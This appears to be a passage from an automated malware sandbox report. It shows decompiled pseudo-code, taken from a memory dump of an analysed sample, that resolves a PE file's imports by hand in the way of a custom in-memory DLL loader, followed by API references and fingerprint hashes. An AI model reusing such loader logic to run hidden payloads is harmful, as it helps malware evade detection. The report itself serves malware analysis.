                      					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
                      					if(IsBadReadPtr(_t64, 0x14) == 0) {
                      						_t66 = _t64 + 0x10;
                      						while(1) {
                      							_t44 =  *((intOrPtr*)(_t66 - 4));
                      							if(_t44 == 0) {
                      								goto L23;
                      							}
                      							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
                      							_v8 = _t46;
                      							if(_t46 == 0) {
                      								_push(0x7e);
                      								goto L22;
                      							} else {
                      								_push(4 +  *(_t88 + 0xc) * 4);
                      								_push( *((intOrPtr*)(_t88 + 8)));
                      								_t80 = E0077AE34();
                      								if(_t80 == 0) {
                      									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
                      									_push(0xe);
                      									L22:
                      									SetLastError();
                      									_t87 = 0;
                      								} else {
                      									 *((intOrPtr*)(_t88 + 8)) = _t80;
                      									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
                      									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
                      									_t81 =  *(_t66 - 0x10);
                      									if(_t81 == 0) {
                      										_t81 =  *_t66;
                      									}
                      									_t82 = _t81 + _v12;
                      									_t76 = _v8;
                      									_v16 =  *_t66 + _v12;
                      									_v20 = _t82;
                      									if( *_t82 != 0) {
                      										while(1) {
                      											_t57 =  *_t82;
                      											_push( *((intOrPtr*)(_t88 + 0x34)));
                      											if(_t57 >= 0) {
                      												_t58 = _t57 + _v12 + 2;
                      											} else {
                      												_t58 = _t57 & 0x0000ffff;
                      											}
                      											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
                      											_t79 = _v16;
                      											_t89 = _t89 + 0xc;
                      											 *_t79 = _t59;
                      											_t60 = _t79;
                      											_t76 = _v8;
                      											if( *_t60 == 0) {
                      												break;
                      											}
                      											_t82 =  &(_v20[2]);
                      											_v16 = _t60 + 4;
                      											_v20 = _t82;
                      											if( *_t82 != 0) {
                      												continue;
                      											} else {
                      											}
                      											goto L16;
                      										}
                      										_t87 = 0;
                      									}
                      									L16:
                      									if(_t87 == 0) {
                      										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
                      										SetLastError(0x7f);
                      									} else {
                      										_t66 = _t66 + 0x14;
                      										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
                      											continue;
                      										} else {
                      										}
                      									}
                      								}
                      							}
                      							goto L23;
                      						}
                      					}
                      					L23:
                      				}
                      				return _t87;
                      			}
                      0x0074f505
                      0x0074f50a
                      0x0074f50b
                      0x0074f50d
                      0x0074f510
                      0x0074f51a
                      0x0074f527
                      0x0074f534
                      0x0074f53a
                      0x0074f53d
                      0x0074f53d
                      0x0074f542
                      0x00000000
                      0x00000000
                      0x0074f54f
                      0x0074f552
                      0x0074f559
                      0x0074f630
                      0x00000000
                      0x0074f55f
                      0x0074f569
                      0x0074f56a
                      0x0074f572
                      0x0074f578
                      0x0074f627
                      0x0074f62c
                      0x0074f632
                      0x0074f632
                      0x0074f638
                      0x0074f57e
                      0x0074f584
                      0x0074f587
                      0x0074f58a
                      0x0074f58d
                      0x0074f592
                      0x0074f594
                      0x0074f594
                      0x0074f596
                      0x0074f59e
                      0x0074f5a4
                      0x0074f5a7
                      0x0074f5aa
                      0x0074f5ac
                      0x0074f5ac
                      0x0074f5ae
                      0x0074f5b3
                      0x0074f5c0
                      0x0074f5b5
                      0x0074f5b5
                      0x0074f5b5
                      0x0074f5c4
                      0x0074f5c7
                      0x0074f5ca
                      0x0074f5cd
                      0x0074f5cf
                      0x0074f5d1
                      0x0074f5d7
                      0x00000000
                      0x00000000
                      0x0074f5df
                      0x0074f5e2
                      0x0074f5e5
                      0x0074f5eb
                      0x00000000
                      0x00000000
                      0x0074f5ed
                      0x00000000
                      0x0074f5eb
                      0x0074f5ef
                      0x0074f5ef
                      0x0074f5f1
                      0x0074f5f3
                      0x0074f612
                      0x0074f619
                      0x0074f5f5
                      0x0074f5f5
                      0x0074f606
                      0x00000000
                      0x00000000
                      0x0074f60c
                      0x0074f606
                      0x0074f5f3
                      0x0074f578
                      0x00000000
                      0x0074f559
                      0x0074f53d
                      0x0074f63a
                      0x0074f63a
                      0x0074f642

                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0074F89B), ref: 0074F52C
                      • IsBadReadPtr.KERNEL32(?,00000014,?,0074F89B), ref: 0074F5FE
                      • SetLastError.KERNEL32(0000007F), ref: 0074F619
                      • SetLastError.KERNEL32(0000007E,?,0074F89B), ref: 0074F632
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLastRead
                      • String ID:
                      • API String ID: 4100373531-0
                      • Opcode ID: fd1f4cbf8099bd9485b688b27bdfe4516c50eb5193b930f4492074520559eca0
                      • Instruction ID: 43cbb0943be27cf41e1875fc5656ac87bb1f7ff421287a1e45c38727d1b4b1bc
                      • Opcode Fuzzy Hash: fd1f4cbf8099bd9485b688b27bdfe4516c50eb5193b930f4492074520559eca0
                      • Instruction Fuzzy Hash: 8E416571A00205EFEB24CF58DC85B6AB7F6FF88310F1484AAE446D7250EB39E911DB11
                      Uniqueness

                      Uniqueness Score: -1.00%